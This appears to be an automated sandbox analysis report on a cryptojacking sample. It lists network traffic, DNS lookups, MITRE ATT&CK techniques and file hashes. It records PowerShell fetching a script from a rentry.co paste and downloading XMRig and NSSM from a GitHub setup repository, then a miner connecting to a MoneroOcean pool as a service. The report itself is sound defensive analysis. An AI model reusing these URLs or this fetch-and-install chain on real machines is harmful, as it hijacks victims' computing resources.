x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 86410A646A3745AFBB176A547D0D8733 Ref B: LON04EDGE0918 Ref C: 2024-06-28T23:37:53Z
date: Fri, 28 Jun 2024 23:37:53 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239370639702_1LY06F7YB2ZF9D3G5&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

Remote address:

150.171.28.10:443

Request

GET /th?id=OADD2.10239370639702_1LY06F7YB2ZF9D3G5&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 634564
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 9C5BBF4E212C4DDD9B36F5092CA7E04C Ref B: LON04EDGE0918 Ref C: 2024-06-28T23:37:53Z
date: Fri, 28 Jun 2024 23:37:53 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239370255172_1LGH0N1M3BEVIZPTE&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

Remote address:

150.171.28.10:443

Request

GET /th?id=OADD2.10239370255172_1LGH0N1M3BEVIZPTE&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 583094
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 7384818872414B4C9D24ABA3E873563E Ref B: LON04EDGE0918 Ref C: 2024-06-28T23:37:54Z
date: Fri, 28 Jun 2024 23:37:54 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239370255173_1DU5CK10FBZ5UERKJ&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

Remote address:

150.171.28.10:443

Request

GET /th?id=OADD2.10239370255173_1DU5CK10FBZ5UERKJ&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 565422
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: F79F9CF779E8407CAD38659B96D9A83B Ref B: LON04EDGE0918 Ref C: 2024-06-28T23:37:54Z
date: Fri, 28 Jun 2024 23:37:54 GMT
DNS

10.28.171.150.in-addr.arpa

Remote address:

8.8.8.8:53

Request

10.28.171.150.in-addr.arpa

IN PTR

Response
DNS

4.73.50.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

4.73.50.20.in-addr.arpa

IN PTR

Response
DNS

gulf.moneroocean.stream

xmrig.exe

Remote address:

8.8.8.8:53

Request

gulf.moneroocean.stream

IN A

Response

gulf.moneroocean.stream

IN CNAME

monerooceans.stream

monerooceans.stream

IN A

149.102.143.109
DNS

109.143.102.149.in-addr.arpa

Remote address:

8.8.8.8:53

Request

109.143.102.149.in-addr.arpa

IN PTR

Response

109.143.102.149.in-addr.arpa

IN PTR

vmi1690904 contaboservernet

172.67.75.40:443

https://rentry.co/regele/raw

tls, http

powershell.exe

1.1kB
20.0kB
16
24

HTTP Request

GET https://rentry.co/regele/raw

HTTP Response

200
185.199.110.133:443

https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/xmrig.zip

tls, http

powershell.exe

123.0kB
3.9MB
2093
2772

HTTP Request

GET https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/xmrig.zip

HTTP Response

200
13.107.21.237:443

https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8ngJn8OhNw7dstVmY8-M37zVUCUydmbmYipy1sQEiynOR_EncIXG3rnrst7D2z1Sg5Jwf16EaCf6229A7TK_macPdnHK7R15Bz2c8jmPlmzVCw52oX5cDgywL2BfpTYg_umDMRhWqJtpYidIkGydZO4ilTNUEYwWlIPjRJBOQrcadnKyR%26u%3DbWljcm9zb2Z0LWVkZ2UlM2FodHRwcyUzYSUyZiUyZm9uZWRyaXZlLmxpdmUuY29tJTJmJTNmb2NpZCUzZGNtbTA3YjdkbnU0%26rlid%3D95ab6cafbb551c3a17610ac76e777707&TIME=20240611T225302Z&CID=531098720&EID=&tids=15000&adUnitId=11730597&localId=w:8CE4F47C-62C1-CBA1-6083-4AA98427395E&deviceId=6825835407638640&muid=8CE4F47C62C1CBA160834AA98427395E

tls, http2

2.4kB
9.0kB
19
15

HTTP Request

GET https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8ngJn8OhNw7dstVmY8-M37zVUCUydmbmYipy1sQEiynOR_EncIXG3rnrst7D2z1Sg5Jwf16EaCf6229A7TK_macPdnHK7R15Bz2c8jmPlmzVCw52oX5cDgywL2BfpTYg_umDMRhWqJtpYidIkGydZO4ilTNUEYwWlIPjRJBOQrcadnKyR%26u%3DbWljcm9zb2Z0LWVkZ2UlM2FodHRwcyUzYSUyZiUyZm9uZWRyaXZlLmxpdmUuY29tJTJmJTNmb2NpZCUzZGNtbTA3YjdkbnU0%26rlid%3D95ab6cafbb551c3a17610ac76e777707&TIME=20240611T225302Z&CID=531098720&EID=531098720&tids=15000&adUnitId=11730597&localId=w:8CE4F47C-62C1-CBA1-6083-4AA98427395E&deviceId=6825835407638640&muid=8CE4F47C62C1CBA160834AA98427395E

HTTP Response

204

HTTP Request

GET https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8ngJn8OhNw7dstVmY8-M37zVUCUydmbmYipy1sQEiynOR_EncIXG3rnrst7D2z1Sg5Jwf16EaCf6229A7TK_macPdnHK7R15Bz2c8jmPlmzVCw52oX5cDgywL2BfpTYg_umDMRhWqJtpYidIkGydZO4ilTNUEYwWlIPjRJBOQrcadnKyR%26u%3DbWljcm9zb2Z0LWVkZ2UlM2FodHRwcyUzYSUyZiUyZm9uZWRyaXZlLmxpdmUuY29tJTJmJTNmb2NpZCUzZGNtbTA3YjdkbnU0%26rlid%3D95ab6cafbb551c3a17610ac76e777707&TIME=20240611T225302Z&CID=531098720&EID=&tids=15000&adUnitId=11730597&localId=w:8CE4F47C-62C1-CBA1-6083-4AA98427395E&deviceId=6825835407638640&muid=8CE4F47C62C1CBA160834AA98427395E

HTTP Response

204
23.62.61.194:443

https://www.bing.com/aes/c.gif?RG=e9d4a8df801741d29d7bc7d387147b7c&med=10&pubId=251978541&tids=15000&type=mv&reqver=1.0&TIME=20240611T225302Z&adUnitId=11730597&localId=w:8CE4F47C-62C1-CBA1-6083-4AA98427395E&deviceId=6825835407638640

tls, http2

1.5kB
5.4kB
17
15

HTTP Request

GET https://www.bing.com/aes/c.gif?RG=e9d4a8df801741d29d7bc7d387147b7c&med=10&pubId=251978541&tids=15000&type=mv&reqver=1.0&TIME=20240611T225302Z&adUnitId=11730597&localId=w:8CE4F47C-62C1-CBA1-6083-4AA98427395E&deviceId=6825835407638640

HTTP Response

200
185.199.110.133:443

https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/nssm.zip

tls, http

powershell.exe

3.1kB
147.7kB
59
112

HTTP Request

GET https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/nssm.zip

HTTP Response

200
150.171.28.10:443

tse1.mm.bing.net

tls, http2

1.2kB
6.9kB
16
15
150.171.28.10:443

tse1.mm.bing.net

tls, http2

1.2kB
6.9kB
16
14
150.171.28.10:443

https://tse1.mm.bing.net/th?id=OADD2.10239370255173_1DU5CK10FBZ5UERKJ&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

tls, http2

110.4kB
3.2MB
2329
2322

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239370639703_1XZVEAKL3PD7EZGL4&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239370255189_1E7XE0SO5A57SENIS&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239370639702_1LY06F7YB2ZF9D3G5&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239370255172_1LGH0N1M3BEVIZPTE&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

HTTP Response

200

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239370255173_1DU5CK10FBZ5UERKJ&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

HTTP Response

200
149.102.143.109:10001

gulf.moneroocean.stream

xmrig.exe

10.0kB
8.8kB
77
62

8.8.8.8:53

196.249.167.52.in-addr.arpa

dns

73 B
147 B
1
1

DNS Request

196.249.167.52.in-addr.arpa
8.8.8.8:53

rentry.co

dns

powershell.exe

55 B
103 B
1
1

DNS Request

rentry.co

DNS Response

172.67.75.40

104.26.3.16

104.26.2.16
8.8.8.8:53

40.75.67.172.in-addr.arpa

dns

71 B
133 B
1
1

DNS Request

40.75.67.172.in-addr.arpa
8.8.8.8:53

140.32.126.40.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

140.32.126.40.in-addr.arpa
8.8.8.8:53

raw.githubusercontent.com

dns

powershell.exe

71 B
135 B
1
1

DNS Request

raw.githubusercontent.com

DNS Response

185.199.110.133

185.199.111.133

185.199.108.133

185.199.109.133
8.8.8.8:53

133.110.199.185.in-addr.arpa

dns

74 B
118 B
1
1

DNS Request

133.110.199.185.in-addr.arpa
8.8.8.8:53

g.bing.com

dns

56 B
151 B
1
1

DNS Request

g.bing.com

DNS Response

13.107.21.237

204.79.197.237
8.8.8.8:53

55.36.223.20.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

55.36.223.20.in-addr.arpa
8.8.8.8:53

194.61.62.23.in-addr.arpa

dns

71 B
135 B
1
1

DNS Request

194.61.62.23.in-addr.arpa
8.8.8.8:53

183.142.211.20.in-addr.arpa

dns

73 B
159 B
1
1

DNS Request

183.142.211.20.in-addr.arpa
8.8.8.8:53

86.23.85.13.in-addr.arpa

dns

70 B
144 B
1
1

DNS Request

86.23.85.13.in-addr.arpa
8.8.8.8:53

56.126.166.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

56.126.166.20.in-addr.arpa
8.8.8.8:53

13.227.111.52.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

13.227.111.52.in-addr.arpa
8.8.8.8:53

145.83.221.88.in-addr.arpa

dns

72 B
137 B
1
1

DNS Request

145.83.221.88.in-addr.arpa
8.8.8.8:53

tse1.mm.bing.net

dns

62 B
170 B
1
1

DNS Request

tse1.mm.bing.net

DNS Response

150.171.28.10

150.171.27.10
8.8.8.8:53

10.28.171.150.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

10.28.171.150.in-addr.arpa
8.8.8.8:53

4.73.50.20.in-addr.arpa

dns

69 B
155 B
1
1

DNS Request

4.73.50.20.in-addr.arpa
8.8.8.8:53

gulf.moneroocean.stream

dns

xmrig.exe

69 B
112 B
1
1

DNS Request

gulf.moneroocean.stream

DNS Response

149.102.143.109
8.8.8.8:53

109.143.102.149.in-addr.arpa

dns

74 B
116 B
1
1

DNS Request

109.143.102.149.in-addr.arpa

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
2f57fde6b33e89a63cf0dfdd6e60a351

SHA1
445bf1b07223a04f8a159581a3d37d630273010f

SHA256
3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

SHA512
42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
5b5352c55a8e79ac8de4be3202d496a1

SHA1
4a263d9e36e5ef972e4b19035cae169e1df6459c

SHA256
eff52a77e2fd653199c31162fbd5557a83995ef0e6e0570bf6495d1b5386b3b8

SHA512
c4e5e245c427bc6f9cc95ae80efbd46fd432bea5a4f9366332b1850d833316e6f4eab0e25259b2ea39c40724dcae91ba748234cb1a3cf95b38d8fed162741d63

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
aad3398f572c2a0df2aa06c2631ca434

SHA1
fca3b1b6142ee0b64cacf458b7a76b241b6ac93e

SHA256
95ffe0258bc12ab3202232228429de06467197646a79f2bd2e13586cf2f0124b

SHA512
6c5ebad07663fdd15de74971b75dbb1efba7de58efa8984acc08b70db522837c59e1d14f79ee4f00e5cbe30c76a7ffcf5c19ca2a4fcdab6c73ee66f0e9a0d4f9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
169ad554a8949510e9d6316d6b7b61d3

SHA1
3c2f12fc3ce578a925ef5abb521b9190a5c82b96

SHA256
ec0bf070977d6c6adc2c4fb85eb6f2efcac09ec684775610d06ce31525edb52d

SHA512
73afe6fdedf52b77b0ddcfe81d7d817cc33e7defb1616229c828b204e9ef6ef16a4df0999f037e85d0db71e153aa59557ab4ce64465d59c2d28b5114124dc3ce

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
29e9df1165daeaa0d69f57013108855f

SHA1
13fd59b789678d83259644dabda8b78ef29dc35a

SHA256
f102f8a39642866dfd5e7e3d120af77a5d7b531cc82bc088f070f65efc9e8c36

SHA512
da71293213068e5b2ccc54ae2384584bb4f01727b3ef739cfe89c1c513dc5109a4ce18a17091c3c238d1454c7c7cc9da149bc4e93773857f5cc7c7090ea58ffd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
41766921a6e7803a5a3d9e17155aebc1

SHA1
29e5f780b111c895fcf46daeeb94c74154576f36

SHA256
22eecb37ad34c60918f3f9987b88bf2f4bb5b9adf401368c3360524ed8023b86

SHA512
e9f15d4948fd87bb4381856f02a28d79671fa92dd902aa282bff0c61fe83097b420f544f49db1b4c459d30eed2f0b51974d7535d7965ba04531bc2396f7bd878

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
3f77c39844c3d0494bfe0a9da985d24b

SHA1
eb52637768c77cc407686bf2a61f220a4b27d56f

SHA256
970506a3142d9e900889ad7e1f3867d91fb1c301b656841e8c797441c112cb79

SHA512
44fd5175895f6c3f4bf2fba0f15a3767cddb78f272143e702c7c819eaee4316b7ba756b31ade303af1b4cb6f2884c53bb567134c3770658083669ffe124dce6a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
d7137c86ce8febc3bcb2d30c0750e5c3

SHA1
780babd3eb2695cb3911b12bb8cf09312be20bb3

SHA256
6df9a5de1ddaa197fcc0e50b7196707dd78b9e806db78ad3d4c19c537312ed70

SHA512
518390e70e7cea1a0eefc78ca0ce18ab12d8c2eb15fef6a54b7bcb223b06b13ce0edc7256eb6765461e37a2203a5ae92d4c4007c5ccf8387cbe911fa773118f2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
192B

MD5
948a9cd12dc752c881d785f6165e1db0

SHA1
552e29e67720c9c1dd661def02b34a60416da477

SHA256
3de0129170e784226ad16a60803b4684008ba06df3860c2a19792dc48281f418

SHA512
c3150e46fd0f3a41104ae2ae56631d1b23f996d5c28a21f0fa9151a710e60a0c2f69d444922ac93e2847e14cc5898af86e5c94f0b831264948866ddc89fc16ce

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
a5c074e56305e761d7cbc42993300e1c

SHA1
39b2e23ba5c56b4f332b3607df056d8df23555bf

SHA256
e75b17396d67c1520afbde5ecf8b0ccda65f7833c2e7e76e3fddbbb69235d953

SHA512
c63d298fc3ab096d9baff606642b4a9c98a707150192191f4a6c5feb81a907495b384760d11cecbff904c486328072548ac76884f14c032c0c1ae0ca640cb5e8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
fbcbac8660c6dc1945517253eab66779

SHA1
d5ee5da60e47a9a79f1d98da7344257c57b2d77e

SHA256
04d16bb41599c912414b4886e16ade3e99f83e639cf16f89eb6cc5f53eb25ca6

SHA512
5bc1fa1b4ea0dc6ccf7187f18de6cd8ecc5ff06b181ca9f9100a3fdb9df676d420f5ee9846a085c169e6daf109e0efdea9e474e21a194afea415821e594a20f9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
aa69341a17f8eb11dce2320ad3803f2d

SHA1
b60989248432186fb1338655158274a83455698c

SHA256
2287dc30190670646097b0f11f0b0b415678b2247f69bfa3e64fd29cedfdab42

SHA512
af7159e8170cf1dcc9966a61c26f1e8dda4c0ccb0b5536f35247670e3e77c625e1cffd7fb2eb77c7ded866e54a494417e69bd423d67afee751ba6f73a63e3175

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
8a424e81b5a6078deff05e153c04a0ee

SHA1
bf209de0dbc1dbe7c5b5b511bd34bf447a3c049b

SHA256
79ce6d6caea4a9eabf8fdbb2a1c58d43fb5a3c500c2dec3fce87c160d2c6bda3

SHA512
aa01195e5c1d641304b08fed4a3bffc916972aa0bc20e928204cef1783f38922a03b761cf2010ccbace1ea0d2f18cda4eaeee4d8969f32fbae5f580e4e38522d

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_n0yzcumb.gp3.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp441.tmp.bat

Filesize
14KB

MD5
623f6006f683afdb4b7406e3a4ec35bf

SHA1
f63f03d7338317224726eba368f1a045fa2142d7

SHA256
21d6e0b0e8135a929a77f48e00d286bfa4fc2d749a61529e559b8a5ceb63e47b

SHA512
df7ae1e436be99bbf9ec7fe1fb745c9e2dba6b99e24019b5b1f78786198f1aed465575a829e9b8141bc92f0a4c4269e140228b4335f9fa724a60f1330ad6d3ab

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
725d38d9eeadc9c2691063936b01f9ec

SHA1
153fd5bd55cfd845516562291a7ab867d68145b5

SHA256
0df3cdd812a582b5ddf5c8019fe7aecf03edb5760f4cf2d0c81ba73590a2ec43

SHA512
fe2758ddaa974696c733367d479dc54695ee1f177275f3b26d575b3c27b8c968b6bab0ce1e5b715e6513d1f39d880462b3d8cc542507f2eeae531a9a6d337658

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
e83e17e1e4b9a100377ebbbaffc806ff

SHA1
901fad9aac42e558d0271ec75c953638aed1e581

SHA256
b0ebbb098c8d6f19fbfb74cf26f41becc82c414dad3e210a79aaf384e9ee179a

SHA512
05c308762c1ea7d0049d011afed694aa108e9ad2481cca169caa62571e193896c2dd3945be115e46df8b80247e0c210718989289d0de9c12012530123b646e06

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
66e75e8b22204045c845758569a31875

SHA1
e50d9bbedede85c156046a3d5adefd1b1239d79d

SHA256
e2a4bab85e9bd3367be5894a56891371cc47fdbfd64d2655c7f2424007a71ff2

SHA512
d5aaa63156a8401a046e0a3101a9de6f191ec7f9729cb4999769602aa13a5d5312b04b007d8aebc2d4ee31af07760711d52facad29b3253aaa1cdc158a195f66

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
d4f8a13f8c90e2b3b2e7d30a553df39c

SHA1
5c5303ef682ffcd31e57d1abd900ba5b637d51e4

SHA256
f7fc5b53e709adc1f4116ff47656f7262d7fb2859a100b3e3a5568453485649a

SHA512
68b0b59a732fecc8b345fa0429039d36bc3031ab65198e4d3783a5c16fa768bb6562131c1db58d00ad9c4af7fd8d77aed3c2150930663280a6bbd635ba5831bd

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
c9ef9c214996db3d88f571226910c5d5

SHA1
420ba30247b1e09f706557a7704a1ebee5d3165c

SHA256
fa55a24dccbf28309642d958cbb73f5053e3a56baa0eda22d4581e0151f5f7c1

SHA512
de91ef4268e67c4fa8d7216637bd9ca69ea33b108352675c954d4719d2d58b9414df78c6ebc8f622fcfbeda4ad5f981c2a17a48f7eeae8626cefe5b6894ec68d

Download Submit
C:\Users\Admin\moneroocean\nssm.exe

Filesize
360KB

MD5
1136efb1a46d1f2d508162387f30dc4d

SHA1
f280858dcfefabc1a9a006a57f6b266a5d1fde8e

SHA256
eee9c44c29c2be011f1f1e43bb8c3fca888cb81053022ec5a0060035de16d848

SHA512
43b31f600196eaf05e1a40d7a6e14d4c48fc6e55aca32c641086f31d6272d4afb294a1d214e071d5a8cce683a4a88b66a6914d969b40cec55ad88fde4077d3f5

Download Submit
C:\Users\Admin\moneroocean\xmrig.exe

Filesize
9.0MB

MD5
9ee2c39700819e5daab85785cac24ae1

SHA1
9b5156697983b2bdbc4fff0607fadbfda30c9b3b

SHA256
e7c13a06672837a2ae40c21b4a1c8080d019d958c4a3d44507283189f91842e3

SHA512
47d81ff829970c903f15a791b2c31cb0c6f9ed45fdb1f329c786ee21b0d1d6cd2099edb9f930824caceffcc936e222503a0e2c7c6253718a65a5239c6c88b649

Download Submit
C:\Users\Admin\nssm.zip

Filesize
135KB

MD5
7ad31e7d91cc3e805dbc8f0615f713c1

SHA1
9f3801749a0a68ca733f5250a994dea23271d5c3

SHA256
5b12c3838e47f7bc6e5388408a1701eb12c4bbfcd9c19efd418781304590d201

SHA512
d7d947bfa40d6426d8bc4fb30db7b0b4209284af06d6db942e808cc959997cf23523ffef6c44b640f3d8dbe8386ebdc041d0ecb5b74e65af2c2d423df5396260

Download Submit
C:\Users\Admin\xmrig.zip

Filesize
3.5MB

MD5
640be21102a295874403dc35b85d09eb

SHA1
e8f02b3b8c0afcdd435a7595ad21889e8a1ab0e4

SHA256
ed33e294d53a50a1778ddb7dca83032e9462127fce6344de2e5d6be1cd01e64b

SHA512
ece0dfe12624d5892b94d0da437848d71b16f7c57c427f0b6c6baf757b9744f9e3959f1f80889ffefcb67a755d8bd7a7a63328a29ac9c657ba04bbdca3fea83e

Download Submit
memory/4860-213-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4860-227-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4860-262-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4860-261-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4860-260-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4860-259-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4860-258-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4860-257-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4860-256-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4860-201-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4860-202-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4860-203-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4860-204-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4860-205-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4860-206-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4860-207-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4860-208-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4860-209-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4860-210-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4860-211-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4860-212-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4860-255-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4860-214-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4860-215-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4860-216-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4860-217-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4860-218-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4860-219-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4860-220-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
